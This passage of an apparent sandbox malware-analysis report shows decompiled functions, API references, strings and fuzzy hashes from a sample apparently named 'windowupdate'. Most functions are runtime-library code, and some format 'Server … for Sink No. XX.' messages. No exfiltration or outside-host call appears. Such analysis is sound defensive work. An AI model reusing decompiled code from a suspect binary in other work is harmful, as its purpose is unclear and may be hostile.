                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 00D368B4
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 3298025750-1732559737
                      • Opcode ID: 4a47c7b0b44d082be9e077b86492aec05f680576a44765a6e1ac0302c3600ab1
                      • Instruction ID: e63b68db9e0cc1aaded51776728e536dc8e5a0e0dafdb47d3d27ea40e9e8d5bd
                      • Opcode Fuzzy Hash: 4a47c7b0b44d082be9e077b86492aec05f680576a44765a6e1ac0302c3600ab1
                      • Instruction Fuzzy Hash: 60F0C275E40319BFCB20BB98DC47F9DB7349B04B01F148199E9052B2C2E2B1DA8487F2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D438E0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00D438E0(void* __esi, CHAR* _a4) {
				void* _t5;
				CHAR* _t7;
				char* _t8;
				void* _t16;
				void* _t17;

				do {
					_t18 = _a4;
					if(_a4 == 0) {
						_t5 = L00D84930(_t18, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcore.h", 0x226, 0, "%ls", L"p != 0");
						_t17 = _t17 + 0x18;
						if(_t5 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if( *_a4 != 0) {
					_t7 = CharNextA(_a4);
					__eflags = _t17 - _t17;
					_t8 = E00DC1520(_t7, __eflags);
				} else {
					_t8 =  &(_a4[1]);
				}
				return E00DC1520(_t8, _t16 - _t17);
			}








                      0x00d438e4
                      0x00d438e4
                      0x00d438e8
                      0x00d43902
                      0x00d43907
                      0x00d4390d
                      0x00d4390f
                      0x00d4390f
                      0x00d4390d
                      0x00d43910
                      0x00d4391c
                      0x00d4392e
                      0x00d43934
                      0x00d43936
                      0x00d4391e
                      0x00d43921
                      0x00d43921
                      0x00d43944

                      Strings
                      • %ls, xrefs: 00D438EF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h, xrefs: 00D438FB
                      • p != 0, xrefs: 00D438EA
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h$p != 0
                      • API String ID: 0-1831341932
                      • Opcode ID: 4816ff988f264c2e6cdec067eecfe3d14c90b2def01feb9287835688530870e5
                      • Instruction ID: 84a305e8407936c26acf9c91478816a6af1fe1641c0b5b234e70f37289d93c0f
                      • Opcode Fuzzy Hash: 4816ff988f264c2e6cdec067eecfe3d14c90b2def01feb9287835688530870e5
                      • Instruction Fuzzy Hash: 23F05C316403657BDE207B18DC43F6D7758DB06784F140419F909AA282E2B2EFC08BF6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DBD00B Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00DBD00B(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xdf68e0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00DBCFF4();
					E00DBCFB6();
					_t13 = WriteConsoleW( *0xdf68e0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                      0x00dbd028
                      0x00dbd02c
                      0x00dbd039
                      0x00dbd03e
                      0x00dbd059
                      0x00dbd059
                      0x00dbd05f

                      APIs
                      • WriteConsoleW.KERNEL32(00DB3E47,?,?,00000000,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?), ref: 00DBD022
                      • GetLastError.KERNEL32(?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?,?,?,?,00DB4B29,?,?), ref: 00DBD02E
                        • Part of subcall function 00DBCFF4: CloseHandle.KERNEL32(FFFFFFFE,00DBD03E,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?,?,?,?,00DB4B29), ref: 00DBD004
                      • ___initconout.LIBCMT ref: 00DBD03E
                        • Part of subcall function 00DBCFB6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DBCFE5,00DB9724,?,?,00DB3E47,?), ref: 00DBCFC9
                      • WriteConsoleW.KERNEL32(00DB3E47,?,?,00000000,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?), ref: 00DBD053
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 7165de91c9a70dd6307eaadf187160c8722449a4aee4bd36e9bb171c3140bc7a
                      • Instruction ID: 65480a14bd9a7674b7f3a5b425ad8c966016246b0bc8c62d57208605148db3c4
                      • Opcode Fuzzy Hash: 7165de91c9a70dd6307eaadf187160c8722449a4aee4bd36e9bb171c3140bc7a
                      • Instruction Fuzzy Hash: A2F0983650122ABBCF222FD59C04ADA3E66FF097E1B058555FA1AD5260D632D820EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D9EB30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D9EB30(intOrPtr* __ecx, void* __edi) {
				intOrPtr* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t49;
				intOrPtr _t78;

				_v8 = __ecx;
				_t49 = _v8;
				_t78 = _v8;
				_t4 = _t49 + 4; // 0x7400f87d
				_t5 = _t78 + 8; // 0x8b026a13
				if( *_t4 ==  *_t5) {
					if( *_v8 != 0) {
						_t20 = _v8 + 8; // 0x8b026a13
						_v16 =  *_t20 -  *_v8 >> 2;
						if(_v16 <= 0x7fffffff) {
							_v20 = _v16 << 1;
							if((E00D8C099(E00D8B480( &_v12, E00D897D0(_v20, __edi,  *_v8, _v20, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x67)),  &_v12) & 0x000000ff) != 0) {
								 *_v8 = E00D8B610( &_v12);
								 *((intOrPtr*)(_v8 + 4)) =  *_v8 + _v16 * 4;
								 *((intOrPtr*)(_v8 + 8)) =  *_v8 + _v20 * 4;
								_v32 = 0;
								E00D8B4E0( &_v12);
								return _v32;
							}
							_v28 = 0xc;
							E00D8B4E0( &_v12);
							return _v28;
						}
						return 0xc;
					}
					_v36 = 4;
					 *_v8 = E00D8B610(E00D8B480( &_v24, L00D892C0(_t78, __edi, 4, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x57)));
					E00D8B4E0( &_v24);
					if( *_v8 != 0) {
						 *((intOrPtr*)(_v8 + 4)) =  *_v8;
						 *((intOrPtr*)(_v8 + 8)) =  *_v8 + 0x10;
						return 0;
					}
					return 0xc;
				}
				return 0;
			}













                      0x00d9eb38
                      0x00d9eb3b
                      0x00d9eb3e
                      0x00d9eb41
                      0x00d9eb44
                      0x00d9eb47
                      0x00d9eb56
                      0x00d9ebce
                      0x00d9ebd6
                      0x00d9ebe0
                      0x00d9ebf1
                      0x00d9ec27
                      0x00d9ec48
                      0x00d9ec58
                      0x00d9ec69
                      0x00d9ec6c
                      0x00d9ec76
                      0x00000000
                      0x00d9ec7b
                      0x00d9ec29
                      0x00d9ec33
                      0x00000000
                      0x00d9ec38
                      0x00000000
                      0x00d9ebe2
                      0x00d9eb58
                      0x00d9eb87
                      0x00d9eb8c
                      0x00d9eb97
                      0x00d9ebab
                      0x00d9ebb9
                      0x00000000
                      0x00d9ebbc
                      0x00000000
                      0x00d9eb99
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9EB78
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9EB61, 00D9EBF6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                      • API String ID: 4219598475-2801755846
                      • Opcode ID: 494daa2ea1defe69f7d14eeb8e0aa82ec707eb83bb5f1b76d480f9b88ed33172
                      • Instruction ID: 0f069d16d1ee55a48555a4d5b3ffa7fb69fdc017c83969165f8864b83c129796
                      • Opcode Fuzzy Hash: 494daa2ea1defe69f7d14eeb8e0aa82ec707eb83bb5f1b76d480f9b88ed33172
                      • Instruction Fuzzy Hash: 2C41FE74A00109EFDB14EF98C992EAEB7B1FF44314F248199E5156B396DB30AE41DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4C690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D4C690(void* __edi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t32;
				intOrPtr _t45;
				intOrPtr _t70;
				intOrPtr _t77;

				if( *0xdf6020 != 0xffffffff) {
					E00D4C490( &_v12);
					_t32 =  *0xdf6020; // 0x5
					_v16 = E00D5B300(_t32);
					if(_v16 != 0xffffffff) {
						if(_v16 == 0) {
							_t77 =  *0xdf6020; // 0x5
							if(E00D5B340(_t77, 0xffffffff) != 0) {
								E00D4C470( &_v8, L00D892C0( &_v12, __edi, 1, 0x28, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\internal\\per_thread_data.cpp", 0x80));
								if((E00D4C4F0( &_v8) & 0x000000ff) != 0) {
									if((E00D4C5B0(E00D4C540( &_v8)) & 0x000000ff) != 0) {
										_v40 = E00D4C510( &_v8);
										E00D4C4B0( &_v8);
										E00D4C4D0( &_v12);
										return _v40;
									}
									_t45 =  *0xdf6020; // 0x5
									E00D5B340(_t45, 0);
									_v36 = 0;
									E00D4C4B0( &_v8);
									E00D4C4D0( &_v12);
									return _v36;
								}
								_t70 =  *0xdf6020; // 0x5
								E00D5B340(_t70, 0);
								_v32 = 0;
								E00D4C4B0( &_v8);
								E00D4C4D0( &_v12);
								return _v32;
							}
							_v28 = 0;
							E00D4C4D0( &_v12);
							return _v28;
						}
						_v24 = _v16;
						E00D4C4D0( &_v12);
						return _v24;
					}
					_v20 = 0;
					E00D4C4D0( &_v12);
					return _v20;
				}
				return 0;
			}
















                      0x00d4c69d
                      0x00d4c6a9
                      0x00d4c6ae
                      0x00d4c6bc
                      0x00d4c6c3
                      0x00d4c6e0
                      0x00d4c6fa
                      0x00d4c70b
                      0x00d4c740
                      0x00d4c752
                      0x00d4c797
                      0x00d4c7cd
                      0x00d4c7d3
                      0x00d4c7db
                      0x00000000
                      0x00d4c7e0
                      0x00d4c79b
                      0x00d4c7a1
                      0x00d4c7a9
                      0x00d4c7b3
                      0x00d4c7bb
                      0x00000000
                      0x00d4c7c0
                      0x00d4c756
                      0x00d4c75d
                      0x00d4c765
                      0x00d4c76f
                      0x00d4c777
                      0x00000000
                      0x00d4c77c
                      0x00d4c70d
                      0x00d4c717
                      0x00000000
                      0x00d4c71c
                      0x00d4c6e5
                      0x00d4c6eb
                      0x00000000
                      0x00d4c6f0
                      0x00d4c6c5
                      0x00d4c6cf
                      0x00000000
                      0x00d4c6d4
                      0x00000000

                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00D4C729
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                      • API String ID: 0-1094830976
                      • Opcode ID: df49e4f9efd6163d6eaa5c895c4bd92b26ce7bbe2d40e53df23db93b05098e20
                      • Instruction ID: 55355c286bdcc7c42817d04c688ab7ba180a5dddaa22c0b99974702fee6d540c
                      • Opcode Fuzzy Hash: df49e4f9efd6163d6eaa5c895c4bd92b26ce7bbe2d40e53df23db93b05098e20
                      • Instruction Fuzzy Hash: 4F315E70D21208ABCB84EBA0D952BFE7774EF10305F105199E416B71D1EB74AB04CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC0840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00DC0840(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0xdc5680);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xdf600c; // 0x71e60372
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00D31AB0();
				_v36 = 0;
				_v40 = 0;
				E00D82DE0( &_v144, 0x64, "Server Walking for Sink No. XX.");
				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = E00D32F30( &_v156);
				_t16 = _v24 + 0x24; // 0xf0000ff
				E00D45CB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E00D330B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E00DC14C0(_t65, 0xdc0944);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x00dc0840
                      0x00dc0843
                      0x00dc0845
                      0x00dc0850
                      0x00dc0857
                      0x00dc0858
                      0x00dc0869
                      0x00dc086b
                      0x00dc086c
                      0x00dc0871
                      0x00dc0873
                      0x00dc087a
                      0x00dc0880
                      0x00dc0883
                      0x00dc088f
                      0x00dc0892
                      0x00dc0899
                      0x00dc08ae
                      0x00dc08c3
                      0x00dc08c8
                      0x00dc08d5
                      0x00dc08de
                      0x00dc08e1
                      0x00dc08e6
                      0x00dc08f0
                      0x00dc08fd
                      0x00dc0908
                      0x00dc090b
                      0x00dc0912
                      0x00dc0917
                      0x00dc0918
                      0x00dc091c
                      0x00dc0924
                      0x00dc093f

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC08AE
                        • Part of subcall function 00D45CB0: VariantInit.OLEAUT32(?), ref: 00D45DA4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0912
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Walking for Sink No. XX., xrefs: 00DC08A0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Walking for Sink No. XX.
                      • API String ID: 2532982526-2197370697
                      • Opcode ID: 5de41d8749e367caa2d51b617a13bee200d934e2ec797c4784ad8f9cb32deb70
                      • Instruction ID: 08703af212d815b07acdac156a0b6f594986620a2b4f55df410d4453b84fef22
                      • Opcode Fuzzy Hash: 5de41d8749e367caa2d51b617a13bee200d934e2ec797c4784ad8f9cb32deb70
                      • Instruction Fuzzy Hash: 23219D71E042099FDB14EF64DC41BAEB7B4FB08310F4042A9E519A3382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC0980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00DC0980(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0xdc56ba);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xdf600c; // 0x71e60372
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00D31AB0();
				_v36 = 0;
				_v40 = 0;
				E00D82DE0( &_v144, 0x64, "Server Paddling for Sink No. XX.");
				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = E00D32F30( &_v156);
				_t16 = _v24 + 0x24; // 0xff9bc2e8
				E00D45AB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E00D330B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E00DC14C0(_t65, 0xdc0a84);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x00dc0980
                      0x00dc0983
                      0x00dc0985
                      0x00dc0990
                      0x00dc0997
                      0x00dc0998
                      0x00dc09a9
                      0x00dc09ab
                      0x00dc09ac
                      0x00dc09b1
                      0x00dc09b3
                      0x00dc09ba
                      0x00dc09c0
                      0x00dc09c3
                      0x00dc09cf
                      0x00dc09d2
                      0x00dc09d9
                      0x00dc09ee
                      0x00dc0a03
                      0x00dc0a08
                      0x00dc0a15
                      0x00dc0a1e
                      0x00dc0a21
                      0x00dc0a26
                      0x00dc0a30
                      0x00dc0a3d
                      0x00dc0a48
                      0x00dc0a4b
                      0x00dc0a52
                      0x00dc0a57
                      0x00dc0a58
                      0x00dc0a5c
                      0x00dc0a64
                      0x00dc0a7f

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC09EE
                        • Part of subcall function 00D45AB0: VariantInit.OLEAUT32(?), ref: 00D45BA4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0A52
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Paddling for Sink No. XX., xrefs: 00DC09E0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Paddling for Sink No. XX.
                      • API String ID: 2532982526-3374743945
                      • Opcode ID: f8dbf8b44bc5ebfb0296e0c662ddfffa0f6dda6f4c43ba8584c4f04bbb333e4e
                      • Instruction ID: d50a6e7a4f44f2c4e82c05f72ef63b8bac4611c4d1f1caa0fde7775eec356c0d
                      • Opcode Fuzzy Hash: f8dbf8b44bc5ebfb0296e0c662ddfffa0f6dda6f4c43ba8584c4f04bbb333e4e
                      • Instruction Fuzzy Hash: ED216DB1E042099FDB14EF54DC52BAEB7B4FB04310F5042A9E519A7382DB796A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC0AC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E00DC0AC0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v144;
				char _v156;
				void _v164;
				signed int _t26;
				signed int _t27;
				void* _t33;
				void* _t38;
				intOrPtr _t45;
				void* _t56;
				void* _t59;
				void* _t63;
				signed int _t65;
				void* _t66;

				_t56 = __edx;
				_push(0xffffffff);
				_push(0xdc56f4);
				_push( *[fs:0x0]);
				_push(__edi);
				_push(__ecx);
				memset( &_v164, 0xcccccccc, 0x25 << 2);
				_pop(_t45);
				_t26 =  *0xdf600c; // 0x71e60372
				_t27 = _t26 ^ _t65;
				_v20 = _t27;
				 *[fs:0x0] =  &_v16;
				_v24 = _t45;
				_v28 = 0;
				_v32 = E00D31AB0();
				_v36 = 0;
				_v40 = 0;
				E00D82DE0( &_v144, 0x64, "Server Flapping for Sink No. XX.");
				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
				_v8 = 0;
				_t33 = E00D32F30( &_v156);
				_t16 = _v24 + 0x24; // 0xb70f0000
				E00D458B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
				_v164 = 1;
				_v8 = 0xffffffff;
				E00D330B0( &_v156, __esi);
				_push(_v24);
				_push(_v164);
				E00DC14C0(_t65, 0xdc0bc4);
				_pop(_t38);
				_pop(_t59);
				 *[fs:0x0] = _v16;
				_t63 = _t27;
				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
			}
























                      0x00dc0ac0
                      0x00dc0ac3
